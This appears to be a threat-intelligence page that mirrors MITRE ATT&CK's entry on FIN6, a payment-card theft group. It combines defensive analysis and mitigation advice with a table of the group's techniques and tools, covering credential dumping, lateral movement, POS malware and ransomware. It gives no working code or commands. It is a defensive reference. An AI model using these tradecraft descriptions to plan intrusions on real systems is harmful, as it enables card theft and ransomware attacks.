G0037: FIN6
Analyst context for executives and security teams
FIN6 matters because ATT&CK describes it as a financially motivated group focused on stealing payment card data, with aggressive compromise of point-of-sale systems in hospitality and retail. The relationship data also links the group to credential theft, remote administration/execution tooling, discovery, exfiltration, backdoors, POS malware, and ransomware families, so leaders should treat this as more than a malware-name problem: it is a test of payment environment segmentation, Windows identity hygiene, incident response readiness, and evidence needed for payment-card and business-continuity assurance.
Executive priority
Prioritize FIN6-relevant coverage where payment processing, retail operations, hospitality operations, Active Directory, and Windows administration paths intersect. Useful leadership questions include: can we prove PoS systems are isolated from general corporate Windows access, can we detect credential dumping and remote movement before data theft or ransomware impact, and do we have audit-ready logs showing access to payment systems and sensitive local data? The ATT&CK relationships to Ryuk, LockerGoga, and Maze also make recovery readiness and ransomware decision-making relevant, especially for organizations where Windows enterprise disruption could affect physical operations.
Technical view
ATT&CK does not provide a FIN6-specific detection section, so defenders should build validation from the linked techniques and software. Focus on Windows credential access involving LSASS and NTDS, remote execution via PsExec/WMI/RDP, Active Directory reconnaissance with tools such as AdFind, command obfuscation, suspicious task/service naming, remote system and service discovery, local data collection, and unencrypted exfiltration paths. For PoS environments, validate monitoring for FrameworkPOS-like behavior and any unauthorized access to systems that process payment-card data. Treat dual-use tools such as PsExec, Cobalt Strike, Mimikatz, Windows Credential Editor, and AdFind as context-dependent signals requiring user, host role, command-line, and authentication correlation.
Likely telemetry
- Endpoint process creation, command-line, parent-child process, module, and script execution telemetry from Windows systems
- Authentication, RDP logon, privileged account use, and lateral movement records
- Domain controller and Active Directory telemetry, including access patterns relevant to NTDS and directory enumeration
- Service creation, scheduled task, WMI, and remote execution logs
- EDR or host telemetry for credential dumping indicators involving LSASS and password dumping tools
Detection direction
- Validate correlation across credential access, discovery, and lateral movement rather than relying on single tool-name alerts.
- Tune detections for dual-use administration tools by comparing activity against approved admin hosts, expected operators, maintenance windows, and normal command patterns.
- Look for chains such as directory discovery followed by credential access, RDP/PsExec/WMI use, local data access, or outbound transfer from unusual hosts.
- Ensure PoS and payment-segment telemetry is actually centralized; many programs have strong corporate endpoint visibility but weak coverage on payment systems.
- Review false positives around legitimate remote support, system administration, vulnerability scanning, and directory queries, but require strong justification for privileged activity touching payment or domain-control assets.
Mitigation priorities
- Start with segmentation and access control around PoS/payment systems, including strict administrative paths from corporate Windows environments.
- Reduce credential theft risk by hardening privileged access, limiting credential exposure on endpoints, and monitoring domain controller access.
- Constrain and govern remote administration channels such as RDP, WMI, and PsExec-style execution with logging, approval, and least privilege.
- Maintain tested incident response and recovery plans for ransomware scenarios reflected in the related software relationships.
- Improve egress monitoring and control for unencrypted exfiltration paths, especially from sensitive business and payment environments.
Analyst notes and limits
The strongest business reading is payment-card theft risk in retail and hospitality, expanded by ATT&CK relationships showing credential access, remote movement, backdoors, PoS malware, and ransomware tooling. This should drive a practical control review across payment segmentation, Active Directory, Windows endpoint monitoring, and recovery readiness rather than a narrow IOC exercise.
The FIN6 intrusion-set record does not specify platforms, tactics, labels, or official detection guidance. Platform and behavior direction above is derived from supplied relationships to ATT&CK software and techniques. Local exposure, current activity, vendor coverage, and whether FIN6-relevant behaviors are present in a specific environment require organization-specific evidence.
FIN6
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1560.003 | Archive via Custom Method Sub-technique | |
| Enterprise | T1566.001 | Spearphishing Attachment Sub-technique | FIN6 has targeted victims with e-mails containing malicious attachments.CitationVisa FIN6 Feb 2019 |
| Enterprise | T1685 | Disable or Modify Tools | |
| Enterprise | T1087.002 | Domain Account Sub-technique | |
| Enterprise | T1059 | Command and Scripting Interpreter | |
| Enterprise | T1572 | Protocol Tunneling | |
| Enterprise | T1213.006 | Databases Sub-technique | FIN6 has collected schemas and user accounts from systems running SQL Server.CitationVisa FIN6 Feb 2019 |
| Enterprise | T1027.010 | Command Obfuscation Sub-technique | FIN6 has used encoded PowerShell commands.CitationVisa FIN6 Feb 2019 |
| Enterprise | T1059.007 | JavaScript Sub-technique | FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.CitationTrend Micro FIN6 October 2019 |
| Enterprise | T1102 | Web Service | |
| Enterprise | T1005 | Data from Local System | FIN6 has collected and exfiltrated payment card data from compromised systems.CitationTrend Micro FIN6 October 2019CitationRiskIQ British Airways September 2018CitationRiskIQ Newegg September 2018 |
| Enterprise | T1547.001 | Registry Run Keys / Startup Folder Sub-technique | |
| Enterprise | T1059.003 | Windows Command Shell Sub-technique | |
| Enterprise | T1588.002 | Tool Sub-technique | |
| Enterprise | T1070.004 | File Deletion Sub-technique | |
| Enterprise | T1003.003 | NTDS Sub-technique | |
| Enterprise | T1134 | Access Token Manipulation | |
| Enterprise | T1068 | Exploitation for Privilege Escalation | |
| Enterprise | T1204.002 | Malicious File Sub-technique | FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.CitationVisa FIN6 Feb 2019 |
| Enterprise | T1036.004 | Masquerade Task or Service Sub-technique | |
| Enterprise | T1566.003 | Spearphishing via Service Sub-technique | |
| Enterprise | T1059.001 | PowerShell Sub-technique | |
| Enterprise | T1560 | Archive Collected Data | |
| Enterprise | T1553.002 | Code Signing Sub-technique | |
| Enterprise | T1021.001 | Remote Desktop Protocol Sub-technique | |
| Enterprise | T1119 | Automated Collection | |
| Enterprise | T1018 | Remote System Discovery | |
| Enterprise | T1053.005 | Scheduled Task Sub-technique | FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.[1] |
| Enterprise | T1569.002 | Service Execution Sub-technique | |
| Enterprise | T1046 | Network Service Discovery | |
| Enterprise | T1048.003 | Exfiltration Over Unencrypted Non-C2 Protocol Sub-technique | FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.CitationTrend Micro FIN6 October 2019 |
| Enterprise | T1047 | Windows Management Instrumentation | |
| Enterprise | T1110.002 | Password Cracking Sub-technique | |
| Enterprise | T1555 | Credentials from Password Stores | FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.CitationVisa FIN6 Feb 2019 |
| Enterprise | T1095 | Non-Application Layer Protocol | FIN6 has used Metasploit Bind and Reverse TCP stagers.CitationTrend Micro FIN6 October 2019 |
| Enterprise | T1078 | Valid Accounts | |
| Enterprise | T1573.002 | Asymmetric Cryptography Sub-technique | |
| Enterprise | T1003.001 | LSASS Memory Sub-technique | FIN6 has used Windows Credential Editor for credential dumping.[1][2] |
| Enterprise | T1555.003 | Credentials from Web Browsers Sub-technique | FIN6 has used the Stealer One credential stealer to target web browsers.CitationVisa FIN6 Feb 2019 |
| Enterprise | T1074.002 | Remote Data Staging Sub-technique |
Groups, software, and campaigns
S0381: FlawedAmmyy
FlawedAmmyy is a remote access tool (RAT) that was first seen in early 2016. The code for FlawedAmmyy was based on leaked source code for a version of Ammyy Admin, a remote access software.[1]
S0632: GrimAgent
GrimAgent is a backdoor that has been used before the deployment of Ryuk ransomware since at least 2020; it is likely used by FIN6 and Wizard Spider.[1]
S0503: FrameworkPOS
FrameworkPOS is a point of sale (POS) malware used by FIN6 to steal payment card data from sytems that run physical POS devices.[1]
S0284: More_eggs
More_eggs is a JScript backdoor used by Cobalt Group and FIN6. Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. [1][2]
S0154: Cobalt Strike
Cobalt Strike is a commercial, full-featured, remote access tool that bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system.[1]
In addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz.[1]
S0005: Windows Credential Editor
Windows Credential Editor is a password dumping tool. [1]
S0552: AdFind
S0029: PsExec
S0449: Maze
S0372: LockerGoga
LockerGoga is ransomware that was first reported in January 2019, and has been tied to various attacks on European companies, including industrial and manufacturing firms.[1][2]
S0446: Ryuk
S0002: Mimikatz
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | 4.0 | Current bundle | 65d27d5cdb3e… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
-
[1]
FireEye FIN6 April 2016
FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024.
Open source URL -
[2]
FireEye FIN6 Apr 2019
McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
Open source URL -
[3]
Crowdstrike Global Threat Report Feb 2018
CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
Open source URL -
[4]
Security Intelligence More Eggs Aug 2019
Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
Open source URL -
[5]
Camouflage Tempest
(Citation: Microsoft Threat Actor Naming July 2023)
-
[6]
FIN6
(Citation: FireEye FIN6 April 2016)
-
[7]
ITG08
(Citation: Security Intelligence More Eggs Aug 2019)
-
[8]
Magecart Group 6
(Citation: Security Intelligence ITG08 April 2020)
-
[9]
Microsoft Threat Actor Naming July 2023
Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
Open source URL -
[10]
Security Intelligence ITG08 April 2020
Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.
Open source URL -
[11]
Skeleton Spider
(Citation: Crowdstrike Global Threat Report Feb 2018)
-
[12]
TAAL
(Citation: Microsoft Threat Actor Naming July 2023)
-
[13]
mitre-attack G0037Open source URL
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.